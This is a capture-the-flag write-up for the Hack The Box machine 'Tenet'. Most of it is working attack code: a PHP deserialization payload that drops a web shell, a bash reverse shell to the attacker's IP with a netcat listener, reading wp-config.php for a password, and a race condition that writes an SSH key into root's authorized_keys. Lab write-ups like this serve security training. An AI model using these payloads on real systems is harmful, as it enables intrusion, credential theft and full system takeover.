Enumeration
Use nmap to find open ports:
nmap -sCV 10.10.10.223
Add this to your /etc/hosts
10.10.10.223 tenet.htb
Read Migration and we found a comment.
Try http://tenet.htb/sator.php but we found nothing.
So I try: http://10.10.10.223/sator.php
And download the backup file:
http://10.10.10.223/sator.php.bak
Foothold
The vulnerability here is PHP object injection vulnerability, you can get more information in Exploiting PHP deserialization.
I will write a new php reverse shell in the server. We can generate the payload with:
<?php
class DatabaseExport
{
public $user_file = 'users.php';
public $data = '<?php system($_GET["cmd"])?>';
}
print urlencode(serialize(new DatabaseExport));
?>
Then we have:
O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A9%3A%22users.php%22%3Bs%3A4%3A%22data%22%3Bs%3A28%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3F%3E%22%3B%7D
And send the payload to the server by accessing:
http://10.10.10.223/sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A9%3A%22users.php%22%3Bs%3A4%3A%22data%22%3Bs%3A28%3A%22%3C%3Fphp+system%28%24_GET%5B%22cmd%22%5D%29%3F%3E%22%3B%7D
Stand a netcat listener in our machine:
nc -lvnp 1234
And call to our listener with:
http://10.10.10.223/users.php?cmd=/bin/bash%20-c%20%22bash%20-i%20%3E&%20/dev/tcp/10.6.63.158/1234%200%3E&1%22
The payload we use is:
/bin/bash -c "bash -i >& /dev/tcp/10.6.63.158/1234 0>&1"
Read file /var/www/html/wordpress/wp-config.php
and we will have neil’s password.
Try to use this password to connect to SSH.
ssh neil@10.10.10.223
Privilege Escalation
Check what we can do with:
sudo -l
Read this file:
cat /usr/local/bin/enableSSH.sh
The script will write ssh public key to a file in /tmp
and then write it to /root/.ssh/authorized_keys
We need to use Race Condition to write our public key to file in /tmp
before it is written in /root
.
In our machine use:
ssh-keygen
Our public key is saved in id_rsa.pub
, we will write this key to /tmp
with:
while true; do echo 'your-public-key' | tee /tmp/ssh-* > /dev/null; done
In another terminal, we run:
touch output.txt
while ! grep "creating" output.txt; do sudo /usr/local/bin/enableSSH.sh > output.txt; done
And when the second terminal stop, we can ssh to root.
ssh -i id_rsa root@10.10.10.223